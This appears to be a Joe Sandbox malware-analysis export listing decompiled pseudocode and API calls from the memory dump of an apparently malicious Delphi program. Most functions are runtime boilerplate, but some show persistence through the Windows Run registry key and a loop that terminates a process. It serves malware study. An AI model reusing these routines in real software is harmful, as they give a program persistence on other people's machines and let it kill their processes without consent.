    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040A980, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 107
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40ab3b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x453064; // 0x405f58
					E00405824(_t52,  &_v8);
				} else {
					_t86 =  *0x453120; // 0x405f50
					E00405824(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x453068; // 0x405f00
					E00405824(_t60,  &_v372);
					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004040F8( &_v340, 0x105,  &_v297);
					E00407660(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x4530a0; // 0x405ff8
					E00405824(_t82,  &_v344);
					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040AB42);
				E00403E88( &_v372);
				E00403EAC( &_v344, 3);
				return E00403E88( &_v8);
			}

































    0x0040a980
    0x0040a98d
    0x0040a993
    0x0040a999
    0x0040a99f
    0x0040a9a5
    0x0040a9aa
    0x0040a9ab
    0x0040a9b0
    0x0040a9b3
    0x0040a9b9
    0x0040a9c0
    0x0040a9d4
    0x0040a9d9
    0x0040a9c2
    0x0040a9c5
    0x0040a9ca
    0x0040a9ca
    0x0040a9de
    0x0040a9eb
    0x0040a9f7
    0x0040aab3
    0x0040aab9
    0x0040aac3
    0x0040aac9
    0x0040aad0
    0x0040aad6
    0x0040aaec
    0x0040aaf1
    0x0040ab03
    0x0040aa1a
    0x0040aa1d
    0x0040aa23
    0x0040aa3b
    0x0040aa4c
    0x0040aa57
    0x0040aa5d
    0x0040aa67
    0x0040aa6d
    0x0040aa74
    0x0040aa7a
    0x0040aa90
    0x0040aa95
    0x0040aaa7
    0x0040aaac
    0x0040ab0c
    0x0040ab0f
    0x0040ab12
    0x0040ab1d
    0x0040ab2d
    0x0040ab3a

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040A31C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t74 = 0x40a49c;
				_t86 = 0x40a49c;
				_t83 =  *0x406188; // 0x4061d4
				if(E004032A0(_t87, _t83) != 0) {
					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00407764(_t74, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00407764(_v8, _t86);
			}































    0x0040a31c
    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040A31A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t75 = 0x40a49c;
				_t89 = 0x40a49c;
				_t85 =  *0x406188; // 0x4061d4
				if(E004032A0(_t92, _t85) != 0) {
					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00407764(_t75, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00407764(_v8, _t89);
			}































    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00402F8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
    C-Code - Quality: 65%
    			E00402F8C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x419020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x419020; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x419020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FFD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403004);
					return RegCloseKey(_v8);
				}
			}












    0x00402f8d
    0x00402f8f
    0x00402f99
    0x00402fb5
    0x00403004
    0x00403016
    0x00403019
    0x00403022
    0x00402fb7
    0x00402fb9
    0x00402fba
    0x00402fbf
    0x00402fc2
    0x00402fc5
    0x00402fe1
    0x00402fe8
    0x00402feb
    0x00402fee
    0x00402ffc
    0x00402ffc

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040A038, Relevance: 7.6, APIs: 5, Instructions: 50
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40a0cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
				_t29 = E00407174(0x40a0e4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x454764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040A0D6);
				return E00403E88( &_v8);
			}










    0x0040a038
    0x0040a03b
    0x0040a040
    0x0040a041
    0x0040a046
    0x0040a049
    0x0040a05f
    0x0040a071
    0x0040a07b
    0x0040a08b
    0x0040a090
    0x0040a095
    0x0040a09a
    0x0040a09a
    0x0040a0a0
    0x0040a0a3
    0x0040a0a3
    0x0040a0b4
    0x0040a0b4
    0x0040a0bb
    0x0040a0be
    0x0040a0c1
    0x0040a0ce

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040A0E8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40a2b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E88(__edx);
				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404148(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x419108], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404150(_t122, 0x40a30c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404070();
												E00404150(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404150(_t122, 0x40a300);
										_t92 = _t92 + 1;
									}
								} else {
									E00404150(_t122, 0x40a2ec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404150(_t122, 0x40a2d8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040B04C(_t124, _t92);
							E004043A8(_t124, _v8, _t92,  &_v20);
							E00404150(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x45473c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EDC(_t122, _t124);
					} else {
						while(_t92 <= E00404148(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404070();
									E00404150(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040A2B9);
				return E00403EAC( &_v24, 4);
			}























    0x0040a0e8
    0x0040a0ed
    0x0040a0ee
    0x0040a0ef
    0x0040a0f0
    0x0040a0f1
    0x0040a0f5
    0x0040a0f7
    0x0040a0fb
    0x0040a0fc
    0x0040a101
    0x0040a104
    0x0040a107
    0x0040a10e
    0x0040a126
    0x0040a13e
    0x0040a288
    0x0040a28a
    0x0040a28f
    0x0040a291
    0x00000000
    0x00000000
    0x0040a1a7
    0x0040a1ac
    0x0040a1b3
    0x0040a1f1
    0x0040a1f6
    0x0040a1f8
    0x0040a217
    0x0040a21c
    0x0040a21e
    0x0040a23f
    0x0040a244
    0x0040a246
    0x0040a25b
    0x0040a25b
    0x0040a25d
    0x0040a263
    0x0040a26a
    0x0040a25f
    0x0040a25f
    0x0040a261
    0x0040a278
    0x0040a282
    0x00000000
    0x00000000
    0x00000000
    0x0040a261
    0x0040a248
    0x0040a24f
    0x0040a254
    0x0040a254
    0x0040a220
    0x0040a227
    0x0040a22c
    0x0040a22c
    0x0040a1fa
    0x0040a201
    0x0040a206
    0x0040a206
    0x0040a287
    0x0040a287
    0x0040a1b5
    0x0040a1be
    0x0040a1cc
    0x0040a1d6
    0x0040a1db
    0x0040a1db
    0x0040a1b3
    0x0040a144
    0x0040a144
    0x0040a149
    0x0040a14c
    0x0040a15a
    0x0040a156
    0x0040a156
    0x0040a156
    0x0040a15e
    0x0040a199
    0x0040a160
    0x0040a185
    0x0040a166
    0x0040a166
    0x0040a168
    0x0040a16a
    0x0040a16c
    0x0040a175
    0x0040a17f
    0x0040a17f
    0x0040a16c
    0x0040a184
    0x0040a184
    0x0040a184
    0x0040a190
    0x0040a15e
    0x0040a297
    0x0040a299
    0x0040a29c
    0x0040a29f
    0x0040a2b1

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0041763C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _t22;
				void* _t35;
				intOrPtr* _t38;
				void* _t47;

				_t47 = __ecx;
				_t38 = __edx;
				E00403E88(__ecx);
				if(_t38 == 0) {
					return E00403EDC(_t47, "0.0.0.0");
				}
				if( *_t38 + 0xd0 - 0xa >= 0) {
					_t22 = E00404348(_t38);
					_push(_t22);
					L0040C4F8();
					if(_t22 != 0) {
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
					}
				} else {
					_t35 = E00404348(_t38);
					_push(_t35);
					L0040C4C8();
					_t22 = _t35 + 1;
					if(_t22 != 0) {
						return E00403EDC(_t47, _t38);
					}
				}
				return _t22;
			}















    0x00417642
    0x00417644
    0x00417648
    0x0041764f
    0x00000000
    0x004176e4
    0x0041765b
    0x0041767a
    0x0041767f
    0x00417680
    0x00417687
    0x00417695
    0x00417699
    0x004176a3
    0x004176a7
    0x004176b1
    0x004176b5
    0x004176bf
    0x004176c3
    0x00000000
    0x004176d6
    0x0041765d
    0x0041765f
    0x00417664
    0x00417665
    0x0041766a
    0x0041766b
    0x00000000
    0x00417671
    0x0041766b
    0x004176ef

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 004185E8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				int _t28;
				char* _t41;
				intOrPtr _t47;
				void* _t51;

				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t51);
				_push(0x418692);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
				_t41 = E00404348(_v12);
				E00404080( &_v20, _t41);
				_t28 = E00404148(_v20);
				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
				RegCloseKey(_v16);
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00418699);
				E00403E88( &_v20);
				return E00403EAC( &_v12, 2);
			}











    0x004185f1
    0x004185f4
    0x004185f7
    0x004185fd
    0x00418605
    0x0041860c
    0x0041860d
    0x00418612
    0x00418615
    0x0041862d
    0x0041863a
    0x00418641
    0x00418649
    0x00418661
    0x0041866a
    0x00418671
    0x00418674
    0x00418677
    0x0041867f
    0x00418691

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00418B04, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 72%
    			E00418B04() {
				char _v8;
				intOrPtr* _t3;
				long _t13;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t26;

				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
				_push(0);
				_t26 = 0;
				_push(_t24);
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				L2:
				E00403F20( &_v8,  *0x454a5c);
				E00418A14(0x454a5c, _t20, _t21);
				E00404294(_v8,  *0x454a5c);
				if(_t26 != 0) {
					_t26 = E00418560(_t26);
					if(_t26 == 0) {
						_t13 =  *0x454a60; // 0x0
						TerminateProcess(OpenProcess(1, 0, _t13), 0);
					}
				}
				Sleep("h N");
				goto L2;
			}










    0x00418b06
    0x00418b0f
    0x00418b17
    0x00418b19
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00000000

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 00418B0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
    C-Code - Quality: 75%
    			E00418B0C() {
				char _v8;
				long _t10;
				void* _t17;
				void* _t18;
				intOrPtr _t20;
				void* _t21;

				_push(0);
				_t21 = 0;
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				while(1) {
					E00403F20( &_v8,  *0x454a5c);
					E00418A14(0x454a5c, _t17, _t18);
					E00404294(_v8,  *0x454a5c);
					if(_t21 != 0) {
						_t21 = E00418560(_t21);
						if(_t21 == 0) {
							_t10 =  *0x454a60; // 0x0
							TerminateProcess(OpenProcess(1, 0, _t10), 0);
						}
					}
					Sleep("h N");
				}
			}









    0x00418b0f
    0x00418b17
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00418b65

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    Function 0040BAA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E0040BAA0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x41912c = _t1;
				}
				if( *0x41912c == 0) {
					 *0x41912c = E004076D4;
					return E004076D4;
				}
				return _t1;
			}





    0x0040baa6
    0x0040baab
    0x0040baaf
    0x0040bab7
    0x0040babc
    0x0040babc
    0x0040bac8
    0x0040bacf
    0x00000000
    0x0040bacf
    0x0040bad5

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
